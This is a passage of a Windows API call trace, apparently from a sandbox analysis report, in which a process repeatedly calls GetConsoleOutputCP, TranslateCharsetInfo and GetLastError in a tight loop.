	[0064.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.421] GetLastError () returned 0xcb
	[0064.421] GetConsoleOutputCP () returned 0x1b5
	[0064.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.421] GetLastError () returned 0xcb
	[0064.421] GetConsoleOutputCP () returned 0x1b5
	[0064.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.421] GetLastError () returned 0xcb
	[0064.421] GetConsoleOutputCP () returned 0x1b5
	[0064.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.421] GetLastError () returned 0xcb
	[0064.421] GetConsoleOutputCP () returned 0x1b5
	[0064.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.421] GetLastError () returned 0xcb
	[0064.421] GetConsoleOutputCP () returned 0x1b5
	[0064.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.421] GetLastError () returned 0xcb
	[0064.421] GetConsoleOutputCP () returned 0x1b5
	[0064.421] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.421] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.422] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.422] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.422] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.422] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.422] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.422] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.422] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.422] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.422] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.422] GetLastError () returned 0xcb
	[0064.422] GetConsoleOutputCP () returned 0x1b5
	[0064.423] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.423] GetLastError () returned 0xcb
	[0064.423] GetConsoleOutputCP () returned 0x1b5
	[0064.423] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.423] GetLastError () returned 0xcb
	[0064.423] GetConsoleOutputCP () returned 0x1b5
	[0064.423] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.423] GetLastError () returned 0xcb
	[0064.423] GetConsoleOutputCP () returned 0x1b5
	[0064.423] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.423] GetLastError () returned 0xcb
	[0064.423] GetConsoleOutputCP () returned 0x1b5
	[0064.423] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.423] GetLastError () returned 0xcb
	[0064.423] GetConsoleOutputCP () returned 0x1b5
	[0064.423] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.423] GetLastError () returned 0xcb
	[0064.423] GetConsoleOutputCP () returned 0x1b5
	[0064.423] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.423] GetLastError () returned 0xcb
	[0064.423] GetConsoleOutputCP () returned 0x1b5
	[0064.423] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.423] GetLastError () returned 0xcb
	[0064.423] GetConsoleOutputCP () returned 0x1b5
	[0064.423] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.424] GetConsoleOutputCP () returned 0x1b5
	[0064.424] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.424] GetConsoleOutputCP () returned 0x1b5
	[0064.424] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.424] GetConsoleOutputCP () returned 0x1b5
	[0064.424] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.424] GetConsoleOutputCP () returned 0x1b5
	[0064.424] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.424] GetConsoleOutputCP () returned 0x1b5
	[0064.424] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.424] GetConsoleOutputCP () returned 0x1b5
	[0064.424] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.424] GetConsoleOutputCP () returned 0x1b5
	[0064.424] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.424] GetConsoleOutputCP () returned 0x1b5
	[0064.424] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.424] GetConsoleOutputCP () returned 0x1b5
	[0064.424] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.424] GetLastError () returned 0xcb
	[0064.425] GetConsoleOutputCP () returned 0x1b5
	[0064.425] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.425] GetLastError () returned 0xcb
	[0064.425] GetConsoleOutputCP () returned 0x1b5
	[0064.425] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.425] GetLastError () returned 0xcb
	[0064.425] GetConsoleOutputCP () returned 0x1b5
	[0064.425] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.425] GetLastError () returned 0xcb
	[0064.425] GetConsoleOutputCP () returned 0x1b5
	[0064.425] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.425] GetLastError () returned 0xcb
	[0064.425] GetConsoleOutputCP () returned 0x1b5
	[0064.425] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.425] GetLastError () returned 0xcb
	[0064.425] GetConsoleOutputCP () returned 0x1b5
	[0064.425] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.425] GetLastError () returned 0xcb
	[0064.425] GetConsoleOutputCP () returned 0x1b5
	[0064.425] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.425] GetLastError () returned 0xcb
	[0064.425] GetConsoleOutputCP () returned 0x1b5
	[0064.425] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.425] GetLastError () returned 0xcb
	[0064.425] GetConsoleOutputCP () returned 0x1b5
	[0064.426] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.426] GetLastError () returned 0xcb
	[0064.426] GetConsoleOutputCP () returned 0x1b5
	[0064.426] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.426] GetLastError () returned 0xcb
	[0064.426] GetConsoleOutputCP () returned 0x1b5
	[0064.426] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.426] GetLastError () returned 0xcb
	[0064.426] GetConsoleOutputCP () returned 0x1b5
	[0064.426] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.426] GetLastError () returned 0xcb
	[0064.426] GetConsoleOutputCP () returned 0x1b5
	[0064.426] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.426] GetLastError () returned 0xcb
	[0064.426] GetConsoleOutputCP () returned 0x1b5
	[0064.426] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.426] GetLastError () returned 0xcb
	[0064.426] GetConsoleOutputCP () returned 0x1b5
	[0064.426] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.426] GetLastError () returned 0xcb
	[0064.427] GetConsoleOutputCP () returned 0x1b5
	[0064.427] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.427] GetLastError () returned 0xcb
	[0064.427] GetConsoleOutputCP () returned 0x1b5
	[0064.427] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.427] GetLastError () returned 0xcb
	[0064.427] GetConsoleOutputCP () returned 0x1b5
	[0064.427] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.427] GetLastError () returned 0xcb
	[0064.427] GetConsoleOutputCP () returned 0x1b5
	[0064.427] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.427] GetLastError () returned 0xcb
	[0064.427] GetConsoleOutputCP () returned 0x1b5
	[0064.427] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.427] GetLastError () returned 0xcb
	[0064.427] GetConsoleOutputCP () returned 0x1b5
	[0064.427] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.427] GetLastError () returned 0xcb
	[0064.427] GetConsoleOutputCP () returned 0x1b5
	[0064.427] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.427] GetLastError () returned 0xcb
	[0064.427] GetConsoleOutputCP () returned 0x1b5
	[0064.427] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.427] GetLastError () returned 0xcb
	[0064.427] GetConsoleOutputCP () returned 0x1b5
	[0064.428] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.428] GetLastError () returned 0xcb
	[0064.428] GetConsoleOutputCP () returned 0x1b5
	[0064.428] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.428] GetLastError () returned 0xcb
	[0064.428] GetConsoleOutputCP () returned 0x1b5
	[0064.428] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.428] GetLastError () returned 0xcb
	[0064.428] GetConsoleOutputCP () returned 0x1b5
	[0064.428] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.428] GetLastError () returned 0xcb
	[0064.428] GetConsoleOutputCP () returned 0x1b5
	[0064.428] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.428] GetLastError () returned 0xcb
	[0064.428] GetConsoleOutputCP () returned 0x1b5
	[0064.428] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.428] GetLastError () returned 0xcb
	[0064.428] GetConsoleOutputCP () returned 0x1b5
	[0064.428] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.429] GetLastError () returned 0xcb
	[0064.429] GetConsoleOutputCP () returned 0x1b5
	[0064.429] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.429] GetLastError () returned 0xcb
	[0064.429] GetConsoleOutputCP () returned 0x1b5
	[0064.429] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.430] GetLastError () returned 0xcb
	[0064.430] GetConsoleOutputCP () returned 0x1b5
	[0064.430] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.430] GetLastError () returned 0xcb
	[0064.430] GetConsoleOutputCP () returned 0x1b5
	[0064.430] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.430] GetLastError () returned 0xcb
	[0064.430] GetConsoleOutputCP () returned 0x1b5
	[0064.430] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.430] GetLastError () returned 0xcb
	[0064.430] GetConsoleOutputCP () returned 0x1b5
	[0064.430] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.430] GetLastError () returned 0xcb
	[0064.430] GetConsoleOutputCP () returned 0x1b5
	[0064.430] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.430] GetLastError () returned 0xcb
	[0064.430] GetConsoleOutputCP () returned 0x1b5
	[0064.430] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.430] GetLastError () returned 0xcb
	[0064.430] GetConsoleOutputCP () returned 0x1b5
	[0064.430] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.430] GetLastError () returned 0xcb
	[0064.430] GetConsoleOutputCP () returned 0x1b5
	[0064.430] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.431] GetLastError () returned 0xcb
	[0064.431] GetConsoleOutputCP () returned 0x1b5
	[0064.431] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.431] GetLastError () returned 0xcb
	[0064.431] GetConsoleOutputCP () returned 0x1b5
	[0064.431] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.431] GetLastError () returned 0xcb
	[0064.431] GetConsoleOutputCP () returned 0x1b5
	[0064.431] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.431] GetLastError () returned 0xcb
	[0064.431] GetConsoleOutputCP () returned 0x1b5
	[0064.431] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.431] GetLastError () returned 0xcb
	[0064.431] GetConsoleOutputCP () returned 0x1b5
	[0064.431] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.431] GetLastError () returned 0xcb
	[0064.431] GetConsoleOutputCP () returned 0x1b5
	[0064.431] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.431] GetLastError () returned 0xcb
	[0064.431] GetConsoleOutputCP () returned 0x1b5
	[0064.431] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.431] GetLastError () returned 0xcb
	[0064.431] GetConsoleOutputCP () returned 0x1b5
	[0064.432] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.432] GetLastError () returned 0xcb
	[0064.432] GetConsoleOutputCP () returned 0x1b5
	[0064.432] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.432] GetLastError () returned 0xcb
	[0064.432] GetConsoleOutputCP () returned 0x1b5
	[0064.432] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.432] GetLastError () returned 0xcb
	[0064.432] GetConsoleOutputCP () returned 0x1b5
	[0064.432] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.432] GetLastError () returned 0xcb
	[0064.432] GetConsoleOutputCP () returned 0x1b5
	[0064.432] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.432] GetLastError () returned 0xcb
	[0064.432] GetConsoleOutputCP () returned 0x1b5
	[0064.432] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.432] GetLastError () returned 0xcb
	[0064.432] GetConsoleOutputCP () returned 0x1b5
	[0064.432] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.432] GetLastError () returned 0xcb
	[0064.432] GetConsoleOutputCP () returned 0x1b5
	[0064.432] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.432] GetLastError () returned 0xcb
	[0064.432] GetConsoleOutputCP () returned 0x1b5
	[0064.432] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.433] GetLastError () returned 0xcb
	[0064.433] GetConsoleOutputCP () returned 0x1b5
	[0064.433] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.433] GetLastError () returned 0xcb
	[0064.433] GetConsoleOutputCP () returned 0x1b5
	[0064.433] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.433] GetLastError () returned 0xcb
	[0064.433] GetConsoleOutputCP () returned 0x1b5
	[0064.433] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.433] GetLastError () returned 0xcb
	[0064.433] GetConsoleOutputCP () returned 0x1b5
	[0064.433] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.433] GetLastError () returned 0xcb
	[0064.433] GetConsoleOutputCP () returned 0x1b5
	[0064.433] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.433] GetLastError () returned 0xcb
	[0064.433] GetConsoleOutputCP () returned 0x1b5
	[0064.433] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.433] GetLastError () returned 0xcb
	[0064.433] GetConsoleOutputCP () returned 0x1b5
	[0064.433] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.433] GetLastError () returned 0xcb
	[0064.433] GetConsoleOutputCP () returned 0x1b5
	[0064.434] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.434] GetLastError () returned 0xcb
	[0064.434] GetConsoleOutputCP () returned 0x1b5
	[0064.434] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.434] GetLastError () returned 0xcb
	[0064.434] GetConsoleOutputCP () returned 0x1b5
	[0064.434] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.434] GetLastError () returned 0xcb
	[0064.434] GetConsoleOutputCP () returned 0x1b5
	[0064.434] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.434] GetLastError () returned 0xcb
	[0064.434] GetConsoleOutputCP () returned 0x1b5
	[0064.434] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.434] GetLastError () returned 0xcb
	[0064.434] GetConsoleOutputCP () returned 0x1b5
	[0064.434] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.434] GetLastError () returned 0xcb
	[0064.434] GetConsoleOutputCP () returned 0x1b5
	[0064.434] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.434] GetLastError () returned 0xcb
	[0064.434] GetConsoleOutputCP () returned 0x1b5
	[0064.434] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.434] GetLastError () returned 0xcb
	[0064.434] GetConsoleOutputCP () returned 0x1b5
	[0064.435] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.435] GetLastError () returned 0xcb
	[0064.435] GetConsoleOutputCP () returned 0x1b5
	[0064.435] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.435] GetLastError () returned 0xcb
	[0064.435] GetConsoleOutputCP () returned 0x1b5
	[0064.435] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.435] GetLastError () returned 0xcb
	[0064.435] GetConsoleOutputCP () returned 0x1b5
	[0064.435] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
